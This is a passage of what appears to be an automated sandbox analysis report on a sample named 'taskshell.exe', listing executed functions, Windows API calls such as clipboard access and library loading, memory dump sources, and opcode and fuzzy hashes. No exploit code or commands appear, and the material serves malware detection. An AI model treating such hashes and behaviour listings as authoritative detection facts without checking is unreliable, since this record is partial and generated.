Instruction ID: 3c86dc48cd5c1c6420f4dcc9103684784d65e843ff60e6b5932c6ace388c53d6
Opcode Fuzzy Hash: aa183334918ecfaa67ca55d46f26d42548f925c883b828db108614a9992b3518
Instruction Fuzzy Hash: 01516A70908B1C8FDB58EF98C885BE9BBF1FB59315F10426ED44AE3251DB30A981CB85

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: taskshell.exe PID: 3132 Parent PID: 3352 taskshell.exeCOMMON

Executed Functions

Function 0567D318, Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43379d1aa4e8de98a9273de41a4dda8e5877b568900a5edc17c8f93e230068ee
Instruction ID: 071fa536beba08192fbb96d6852cf6996daed94c4e86619cf4c59e665b74521a
Opcode Fuzzy Hash: 43379d1aa4e8de98a9273de41a4dda8e5877b568900a5edc17c8f93e230068ee
Instruction Fuzzy Hash: 5FF15C70A00209CFDB14DFA9C948BADBBF2BF48314F158969E419AF365DB74E945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 017EB290, Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 017EB2F0
GetCurrentThread.KERNEL32 ref: 017EB32D
GetCurrentProcess.KERNEL32 ref: 017EB36A
GetCurrentThreadId.KERNEL32 ref: 017EB3C3

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ab756f1b83938387d613995f32b5a579c2407dc8bac4fe753b7608d7e1573a1b
Instruction ID: abdfade35e788bdedd2dd100493e0b17b78b5e646858eaa89b9c7d597eb81c5a
Opcode Fuzzy Hash: ab756f1b83938387d613995f32b5a579c2407dc8bac4fe753b7608d7e1573a1b
Instruction Fuzzy Hash: A25143B09002498FDB14CFAAD548BDEBFF4EF4C314F24886AE419A7290C7746984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 017EB292, Relevance: 6.1, APIs: 4, Instructions: 119
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 017EB2F0
GetCurrentThread.KERNEL32 ref: 017EB32D
GetCurrentProcess.KERNEL32 ref: 017EB36A
GetCurrentThreadId.KERNEL32 ref: 017EB3C3

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5bf557ab9e294f1e894880949087a08eb42387c135113f4760a2701b3f1322c8
Instruction ID: 118899b0512af690d24188b2b8e2c52b8ab25fb47e1ce11a907210442d230d8c
Opcode Fuzzy Hash: 5bf557ab9e294f1e894880949087a08eb42387c135113f4760a2701b3f1322c8
Instruction Fuzzy Hash: 485122B09006498FDB14CFA9D548BEEBFF5EF4C314F24886AE419A7290C7745984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 017E8FA8, Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017E91EE

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f0e8fdd92dc92a26df46d50e1f8cf501991155821fbd51f69c9cae4190f51127
Instruction ID: 09be582b13659b6312604b9cf5f819b5826c49760b7e8f53846eef7f0324c699
Opcode Fuzzy Hash: f0e8fdd92dc92a26df46d50e1f8cf501991155821fbd51f69c9cae4190f51127
Instruction Fuzzy Hash: BE7144B0A00B058FD764DF6AD04879AFBF5BF88208F00892ED55ADBA50DB75E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05676C5C, Relevance: 1.6, APIs: 1, Instructions: 149
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 056785AD

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ee6dfe57f9831006866b0bf207b1130f613d48cd67a86ee559d4c29176e78087
Instruction ID: 64f32d5b7e08f01ce06e47d9f750921e3fe3308e146354bda3104204cf72cb50
Opcode Fuzzy Hash: ee6dfe57f9831006866b0bf207b1130f613d48cd67a86ee559d4c29176e78087
Instruction Fuzzy Hash: B151ACB2C046498FDB10CF98C889BDEBBF4FB18324F58445AD554A7340E3B4A981CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017EF7B4, Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017EF8CA

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6eeb3c05e88d8916a7a75c63d55fc25711839ff4892af116a9527bb4365ce2c6
Instruction ID: 57cdb2884da60a831d5896b3af1669cc6fb01ec3add955bff5998ad45ca03a17
Opcode Fuzzy Hash: 6eeb3c05e88d8916a7a75c63d55fc25711839ff4892af116a9527bb4365ce2c6
Instruction Fuzzy Hash: AD51CDB1D00309AFDB14CF99C884ADEFBF5BF48314F24852AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 017EF7B8, Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017EF8CA

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2f9e465323803fb0b96255e2822785ec03f3ce5c586ae83ccad54c6e741eb7e6
Instruction ID: 312ddf81b6dc05c3e7604197a153249e41f4cc31b10b8e626dbaa7a8d5c5f3c2
Opcode Fuzzy Hash: 2f9e465323803fb0b96255e2822785ec03f3ce5c586ae83ccad54c6e741eb7e6
Instruction Fuzzy Hash: D741BDB1D00349AFDB14CFA9D884ADEFBF5BF48314F24852AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05678180, Relevance: 1.6, APIs: 1, Instructions: 102
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0567824F

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: d194ab959dc6e120608cffa309b7bd673e9e2e420d046337e37e8b98adae3021
Instruction ID: 68b24240d47e27390f52c70746a17ddf77c06e6b6a432758e3d901d31605557b
Opcode Fuzzy Hash: d194ab959dc6e120608cffa309b7bd673e9e2e420d046337e37e8b98adae3021
Instruction Fuzzy Hash: 1C31D27190838D9FCB12CFA5C848AEEBFF8EF49210F08849AE954A7211D3759854DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05671F70, Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05672031

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f187b0dc9d2f5154ff2882ad52d72c6399f09ffdfd43ef37181aa923bdcefffc
Instruction ID: 87e62cbe0540eaecea36a75785ab3a28cf0266d092d354ff4afe07fb99f8d1c2
Opcode Fuzzy Hash: f187b0dc9d2f5154ff2882ad52d72c6399f09ffdfd43ef37181aa923bdcefffc
Instruction Fuzzy Hash: E0411BB8900249DFDB14CF99C448AAAFBF5FF89314F14C459D519A7321D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0567A414, Relevance: 1.6, APIs: 1, Instructions: 75
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 0567A4A8

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 8c933fddd1f73b93aa1635d8d3b92dd465966bf07c3163aeec3c9c10d9590c12
Instruction ID: 3e8354e009e60f29eb67aac255eaff166409663eb7ab2810ded0ff1a12d55f65
Opcode Fuzzy Hash: 8c933fddd1f73b93aa1635d8d3b92dd465966bf07c3163aeec3c9c10d9590c12
Instruction Fuzzy Hash: 2C3102B0E002489FEB10DFD9C889BDEBBF5AF48314F14842AE505AB390D7B45889CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05679FC8, Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 0567A4A8

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 78784830240eee87fa6e38bbf65eb60cae08dcae187cacbcceecd2f371d2cb17
Instruction ID: ebc9dcb7a24f3c38909bf1f4a3dfa953a1a8268f78f40e5623b3fef176eeda10
Opcode Fuzzy Hash: 78784830240eee87fa6e38bbf65eb60cae08dcae187cacbcceecd2f371d2cb17
Instruction Fuzzy Hash: 593102B0D0420C9FEB10DFD8C588BDEBBF5AF48314F148429E505AB390D775A889CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017EB8B8, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017EB947

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2fccf9aa85cf4b2b7e23001b225b4aaae402846bc96099639c8933588bf232f5
Instruction ID: f27518a01cc5b9a01af0850cae1143e2b04171f5a9d8a05dbc78f956a328ef91
Opcode Fuzzy Hash: 2fccf9aa85cf4b2b7e23001b225b4aaae402846bc96099639c8933588bf232f5
Instruction Fuzzy Hash: D821F4B5D04248DFDB10CFA9D884ADEBFF8EB49324F14842AE954A7250D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017EB8C0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017EB947

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c15d07c742ea3c1936bcf9a5bf365be181b63ec2b4264b2b7cf71fa7246938f1
Instruction ID: 45b978ddb75aff9f59b76e7472f1d1ee1e73a4e434e9b4e31660420bebaea759
Opcode Fuzzy Hash: c15d07c742ea3c1936bcf9a5bf365be181b63ec2b4264b2b7cf71fa7246938f1
Instruction Fuzzy Hash: 2021B3B5900249DFDB10CF9AD984ADEBBF8EB48324F14842AE914A7350D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017E8348, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017E9269,00000800,00000000,00000000), ref: 017E947A

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 11c047b48f8dc82ca20ebae1d55cec8f15b213e731375b0e644ae672f79fd226
Instruction ID: 223db3bdd715a7c9b9d68ea0ceb23211eea40d4dff9a2a93ceff29dc228eb051
Opcode Fuzzy Hash: 11c047b48f8dc82ca20ebae1d55cec8f15b213e731375b0e644ae672f79fd226
Instruction Fuzzy Hash: 441103B69042499FDB10CF9AD448BDEFBF8EB49314F14842AE919A7200C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017E9408, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017E9269,00000800,00000000,00000000), ref: 017E947A

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 337dbf695888a0e576b8c3d32a32d8811cc90daa386a27c2e3be957dbb549008
Instruction ID: c5d08381c68f6d4caec2c1e4671893e99316eb25f073a6dc0eb697dd49d89d5c
Opcode Fuzzy Hash: 337dbf695888a0e576b8c3d32a32d8811cc90daa386a27c2e3be957dbb549008
Instruction Fuzzy Hash: 912124B2C042498FDB10CFA9D444ADEFBF4AF49314F14852AD529A7240C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 056781E0, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0567824F

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 576aeb16c0ec0128ce5ff6386a98abb4a4e4d2194d6a2509a837c75e8d97cf92
Instruction ID: dfff63812298d21a63a0ff886dc3cae1226504d5e2628b3a7f4feed0ae7661ca
Opcode Fuzzy Hash: 576aeb16c0ec0128ce5ff6386a98abb4a4e4d2194d6a2509a837c75e8d97cf92
Instruction Fuzzy Hash: 341149B19002499FDF10CF99C848BDEBFF8EF48320F14841AE525A7210C375A994DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05678549, Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 056785AD

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9143f9226544d98fe528f9ad41268eef601984d66547cb1c7c729124103c2e21
Instruction ID: f4a2bc1ed112c1867e297660828205c3f2ac55f1f0011fcbc9a40f6c0ac17f85
Opcode Fuzzy Hash: 9143f9226544d98fe528f9ad41268eef601984d66547cb1c7c729124103c2e21
Instruction Fuzzy Hash: DD1128B58002499FDB50DF99C989BDEBBF8FB48320F14881AD514A3701C374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017E9188, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017E91EE

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a5c7ff7ffde3b9160ead32266e4bf9f4b26faaf31e2830bd48cd7388b3950723
Instruction ID: 0967622aae8ad9345f5b2e471d590048bf42626c1c27819c9318d595d0be6443
Opcode Fuzzy Hash: a5c7ff7ffde3b9160ead32266e4bf9f4b26faaf31e2830bd48cd7388b3950723
Instruction Fuzzy Hash: 9011E3B6C046498FDB10CF9AD848BDEFBF8EF48224F14842AD929A7600D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05673E0C, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05674530), ref: 05679C3F

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 428401a4673fd24c80a9a8b823ee4a698e7a1faacb9988824d35dde48258634b
Instruction ID: b19492e0e8c8347913b448427cb7ae08b593f4829b7a6f7555a68c601c2d9073
Opcode Fuzzy Hash: 428401a4673fd24c80a9a8b823ee4a698e7a1faacb9988824d35dde48258634b
Instruction Fuzzy Hash: 8D1115B1D042488FCB10DF99D548BDEBBF8EB48324F24846AD519B7740D374A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05679EB4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0567A32D

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c4ed576b0e852b95a85013ea695f773bd35ca8e61949ac988aa44f01bdb90359
Instruction ID: d9969412ed591beceff4404e18b7cb3a8aa1237db200f9e04739a6357e60013e
Opcode Fuzzy Hash: c4ed576b0e852b95a85013ea695f773bd35ca8e61949ac988aa44f01bdb90359
Instruction Fuzzy Hash: 331115B19042488FCB20DFD9D4487DEBBF8EB48324F14841AD519B7700D379A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05679BD9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05674530), ref: 05679C3F

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 65db7da27ced642541dece7294dfd9e5a554e5d6afa670c774439c538dd41d2c
Instruction ID: 11729eab0cc6bc2ba5d9c690838aea0836db26917d4e9952a2c49427ee31f071
Opcode Fuzzy Hash: 65db7da27ced642541dece7294dfd9e5a554e5d6afa670c774439c538dd41d2c
Instruction Fuzzy Hash: 071103B19046488FDB20CF99D449BDFBBF8FB48324F24846AD569A7740D3B4A584CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017EF9FB, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 017EFA5D

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 28f6a9fc4e6f2e194d9814f0d3cdc7ed993c3ad11fa54d56ad48ddbbb2e52218
Instruction ID: 5eb323ef2e7635c9c57205ee0bcb6bfe466c362d771515740b5ebbaba37245e0
Opcode Fuzzy Hash: 28f6a9fc4e6f2e194d9814f0d3cdc7ed993c3ad11fa54d56ad48ddbbb2e52218
Instruction Fuzzy Hash: CA11F2B58003499FDB10DF99D488BDEFBF8EB49324F14841AE969A7740D374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0567A2D3, Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0567A32D

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0ca7da233c751cdf3516cd37c63a258aa92e4708e77488c241be3ae91dfa46d2
Instruction ID: 02e036350f1234e1082128c74e66b5ce1140d0f4d8ceebe3749c79a75404739c
Opcode Fuzzy Hash: 0ca7da233c751cdf3516cd37c63a258aa92e4708e77488c241be3ae91dfa46d2
Instruction Fuzzy Hash: 3F11F7B19042488FDB10DF99D4457DEBBF8EB48324F14841AD519B7740D379A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017EFA00, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 017EFA5D

Memory Dump Source

Source File: 0000000C.00000002.562063138.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17e0000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 03eab49379cf263ae0a88095b9060ad65b7ff828aa7f81938042eebb0289cc85
Instruction ID: e4a2d2b2b28096225e2a747192322856642a8d5f187bd482dc9ddbcba8855e41
Opcode Fuzzy Hash: 03eab49379cf263ae0a88095b9060ad65b7ff828aa7f81938042eebb0289cc85
Instruction Fuzzy Hash: 5B1115B5800248CFDB10CF99D488BDEFBF8EB48324F14841AD915A7740C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05676CD0, Relevance: 1.5, APIs: 1, Instructions: 39windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 056785AD

Memory Dump Source

Source File: 0000000C.00000002.564318112.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5670000_taskshell.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f7aff673b98446afd2637c6d62cbc3f8cbf0f7d4661d52c3ead830fa46e2b760
Instruction ID: e9047da4bc9aa7e895731b764b3709c4e1da291da10a18868fbf60ffc4c197c2
Opcode Fuzzy Hash: f7aff673b98446afd2637c6d62cbc3f8cbf0f7d4661d52c3ead830fa46e2b760
Instruction Fuzzy Hash: 2601C2B080434D9FDB50DF9AC989BDABFF8EB08314F148819E515A7340D3B4A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0146D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.557263634.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_146d000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: babaed9e9c003b09bf0ccfb5016bb4a3410566d8a8078b5addd44a6a83bb243b
Instruction ID: 9797b78fdf95b92dfb5956ac707181bf7698fb7bc955d714840d6272a64d0d4f
Opcode Fuzzy Hash: babaed9e9c003b09bf0ccfb5016bb4a3410566d8a8078b5addd44a6a83bb243b
Instruction Fuzzy Hash: E92125B5A04344DFDB15DF94D8C0B16BB69FB8435CF24C96AD8890B356C336D847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0146D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.557263634.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_146d000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96cb4a1155564160e07a1b27376d9fc524e774e89e2caf81d70aee8ffcb32b4
Instruction ID: d6fff95bea39df7773bfdfff8c06fa69227dedb45688687d1b316712c778e43a
Opcode Fuzzy Hash: d96cb4a1155564160e07a1b27376d9fc524e774e89e2caf81d70aee8ffcb32b4
Instruction Fuzzy Hash: 1A2183755093808FCB02CF64D590716BF71EB46218F28C5EBD8858B667C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: taskshell.exe PID: 6772 Parent PID: 3352 taskshell.exeCOMMON

Executed Functions

Function 056FD318, Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33809ee299d7ae5d1a7ecf580dc429b7428c139a738940674e42fbc43a328a1e
Instruction ID: a21e8f717d404ed53c6cf4002f428a304603f7f6c4a10ca3006fb8455adc3dd8
Opcode Fuzzy Hash: 33809ee299d7ae5d1a7ecf580dc429b7428c139a738940674e42fbc43a328a1e
Instruction Fuzzy Hash: 0AF14B70E00209CFDB14DFA9C848BADBBF2BF48304F558569D519AF3A5DB74A946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0246B260, Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0246B2D0
GetCurrentThread.KERNEL32 ref: 0246B30D
GetCurrentProcess.KERNEL32 ref: 0246B34A
GetCurrentThreadId.KERNEL32 ref: 0246B3A3

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c0942352a5dc6d3893ca4cfbd9e6b1ac6c6fd7c93e755e7419ca1e7cf1ce8cbe
Instruction ID: 2255ce12edf11dd427aa338d7b07b0eafd1f2453973c2de4f3ccef36175b9cd5
Opcode Fuzzy Hash: c0942352a5dc6d3893ca4cfbd9e6b1ac6c6fd7c93e755e7419ca1e7cf1ce8cbe
Instruction Fuzzy Hash: 7B5168B09006488FDB14CFA9D5487EEBBF0EF48318F24845AD419A7351C7755884CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0246B270, Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0246B2D0
GetCurrentThread.KERNEL32 ref: 0246B30D
GetCurrentProcess.KERNEL32 ref: 0246B34A
GetCurrentThreadId.KERNEL32 ref: 0246B3A3

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dfd318142e92a8901e8545453248fa7df77d50ad3e257bb1b02a0ce5951a83a0
Instruction ID: 243136b1578aedf181190e6c076f95ef8c9942c9eac4d98c8ad57d6902f277b0
